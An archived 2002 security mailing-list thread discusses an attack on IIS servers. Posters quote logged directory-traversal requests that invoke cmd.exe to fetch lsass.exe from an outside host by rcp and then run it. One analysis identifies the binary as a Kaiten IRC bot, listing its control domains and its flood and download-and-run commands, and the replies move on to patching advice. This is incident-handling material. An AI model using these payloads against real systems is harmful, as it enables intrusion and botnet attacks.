If you want something that automatically installs only patches you approve, take a look at http://www.microsoft.com/windows2000/windowsupdate/sus/default.asp It might help you in your environment. > -----Original Message----- > From: zeno [mailto:bugtraqat_private] > Sent: Tuesday, September 24, 2002 2:08 PM > To: John Campbell > Cc: incidentsat_private > Subject: Re: new IIS worm? (rcp lsass.exe) > > > > > > Windows Update from you-know-who actually does what you > describe. I'd > > always been leery of it, but tried it out recently when > setting up a > > W2K test server, and it performed as advertised. It did > take several > > iterations to get everything updated, owing to various dependencies. > > When I used windows update it downloaded the patches but > didn't install them. I had to manually go through each one. > While this isn't a big deal I am looking for something 100 > percent automated with install of the patches. Perhaps I'm > missing something I deal mostly with unix. > > - zeno > > > > > > Regards, > > > > John Campbell, CISSP, GCWN > > Information Security Engineer > > Washington School Information Processing Cooperative > > (WSIPC) > > Everett, Washington, USA > > > > -----Original Message----- > > From: zeno [mailto:bugtraqat_private] > > Sent: Tuesday, September 24, 2002 11:29 AM > > To: Mark Challender > > Cc: 'pjat_private'; incidentsat_private > > Subject: Re: new IIS worm? (rcp lsass.exe) > > > > > > > > > > Hardening of IIS with the tools available at Microsoft and using > > > URLSCAN with the EXE blocking on will stop these attacks. > > > > > > Patch, patch, patch, recheck the patches and use URLSCAN! > > > > Does anyone know of a gui windows tool that scans your system and > > provides you with a list of needed patches, and then allows you to > > select, and have it autodownload and install them? I can't seem to > > find one (needed mostly for iis). > > > > - zenoat_private > > > > > > > > > > > > Mark Challender > > > Network Administrator > > > > > > ================== > > > Veni, Vidi, Geeki > > > ================== > > > > > > > > > -----Original Message----- > > > From: pjat_private [mailto:pjat_private] > > > Sent: Monday, September 23, 2002 3:27 AM > > > To: incidentsat_private > > > Subject: Re: new IIS worm? (rcp lsass.exe) > > > > > > > > > > > > Christian Mock: > > > > > > >Then it seems to go after the web servers, sending the following: > > > > > > >GET > > > > /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls > > > as > > > s.exe+ > > > . > > > HTTP/1.0.. > > > > > > >and > > > > > > >GET > /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0 > > > > > > >I've been able to get hold of that lsass.exe binary > (9728 bytes), > > > >but > > > > > >I lack the skills to analyze it; I'll happily mail it to anybody > > > >who > > > >asks. > > > > > > > > > We have seen this attack from 4 different sources since Sept. 16, > > > and > > > have informed the owner of 64.21.95.7 and downloaded the > lsass.exe for > > > > > investigation. > > > > > > Based on the attack rate this is most likely a scripted or manual > > > attack, not a worm. > > > > > > Judging from the embedded string in this compressed binary it > > > appears to be an IRC bot based on the kaiten.c code written by > > > contem@efnet, the author of the Slapper worm : > > > > > > Kaiten Win32 API version 2002 by contem@efnet > > > > > > The binary contains these domainnames, most likeky IRC > servers used > > > for controlling the bot: > > > > > > telsa5.mine.nu (Korea) > > > irc.logicfive.net (Taiwan) > > > moncredo.shacknet.nu (USA) > > > telsacredo.shacknet.nu (USA) > > > lar.ath.cx (Taiwan) > > > > > > The program accepts commands to make various DOS attacks > or download > > > new version or executables with http: > > > > > > NOTICE %s :PUSH <target> <port> <secs> = A push flooder > > > NOTICE %s :TCP <target> <port> <secs> = A syn flooder > > > NOTICE %s :UDP <target> <port> <secs> = A udp flooder > > > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder > > > NOTICE %s :NICK <nick> = Changes the nick of the > > client > > > NOTICE %s :DISABLE <pass> = Disables all > packeting from > > this > > > client > > > NOTICE %s :ENABLE <pass> = Enables all > packeting from > > this > > > client > > > NOTICE %s :UPDATE <http address> = Downloads a > file off the > > web and > > > updates the client > > > NOTICE %s :RUN <http address> = Downloads a > file off the > > web and > > > runs it > > > NOTICE %s :GET <http address> = Downloads a > file off the > > web > > > NOTICE %s :ADDSERVER <server> = Adds a server > to the list > > > NOTICE %s :DELSERVER <server> = Deletes a > server from the > > list > > > NOTICE %s :LISTSERVERS = Lists server > on the list > > > NOTICE %s :KILL = Kills the client > > > NOTICE %s :VERSION = Requests > version of client > > > NOTICE %s :HELP = Displays this > > > > > > > > > There seems also to be a default account and password in > the german > > > language included in this specific version of Kaiten. > > > > > > The IIS attack that tries to inject this Trojan usually > has another > > > URL with "CONNECT chat.vtm.be:6667". This is an attempt > to proxy an > > > connection to port 6667(IRC) on chat.vtm.be. > > > > > > > > > > > > Peter Jelver > > > ... > > > > > > eSec A/S > > > > > > http://www.esec.dk > > > > ...................................................................... > > > ...... > > > . > > > > > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A > 128F D85C A7D7 > > > > > > > > > > > > > > > > > > > -------------------------------------------------------------------- > > > -- > > > ------ > > > This list is provided by the SecurityFocus ARIS analyzer service. > > > For more information on this free incident handling, management > > > and tracking system please see: http://aris.securityfocus.com > > > > > > > -------------------------------------------------------------------- > > > -- > > > ------ > > > This list is provided by the SecurityFocus ARIS analyzer service. > > > For more information on this free incident handling, management > > > and tracking system please see: http://aris.securityfocus.com > > > > > > > > > > > > > ---------------------------------------------------------------------- > > -- > > ---- > > This list is provided by the SecurityFocus ARIS analyzer > service. For > > more information on this free incident handling, management > > and tracking system please see: http://aris.securityfocus.com > > > > > > > -------------------------------------------------------------- > -------------- > This list is provided by the SecurityFocus ARIS analyzer > service. For more information on this free incident handling, > management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Sep 26 2002 - 22:16:45 PDT